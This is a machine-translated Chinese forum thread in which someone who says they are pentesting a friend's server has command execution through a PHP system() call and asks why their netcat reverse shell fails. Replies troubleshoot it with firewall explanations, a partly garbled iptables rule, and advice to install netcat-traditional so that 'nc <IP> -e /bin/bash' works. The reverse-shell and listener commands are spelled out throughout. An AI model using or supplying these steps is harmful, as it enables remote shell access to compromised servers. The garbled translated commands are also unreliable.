我正在给朋友服务器做一个pentest,我成功地在服务器的php页面上写了system()
然后我尝试在我的终端上制作一个反向shell。
我用户NetCat开始收听我的7777端口nc -vlnp 7777
并检查是否安装了NetCat并且是。
所以发送命令到PHP nc <MyIp> 7777 -e /bin/bash
连接到我的终端Yap不工作,只是不连接,是一个打开我的路由器上的端口。
任何人都知道为什么?
这是因为防火墙。尝试禁用Windows防火墙。它使用基于主机的防火墙,因此只有在Windows计算机启动了连接时,才能接受任何到Windows的传入连接。它基于动态状态包过滤主体。它会记住它发送的数据包并接受与之相关的任何连接。与Linux相同。 iptables配置。 Iptables - L确保您的防火墙不阻止端口7777.使用以下命令Iptables - A输入 - 我eth0 - p tcp - - 目标端口7777 - j接受它是服务器尝试连接到您的PC和Linux防火墙阻止它。同样,如果您和您的服务器位于不同的网络中,则路由器具有阻止任何传入连接的网络防火墙,除非启用转发。
可能有多种原因。
首先要考虑的是防火墙阻止受感染主机上的出站连接。
其次是netcat并不总是支持-e
参数。如果可能,安装netcat包apt-get install netcat
并使用nc.traditional <your IP> -e /bin/bash
祝好运 !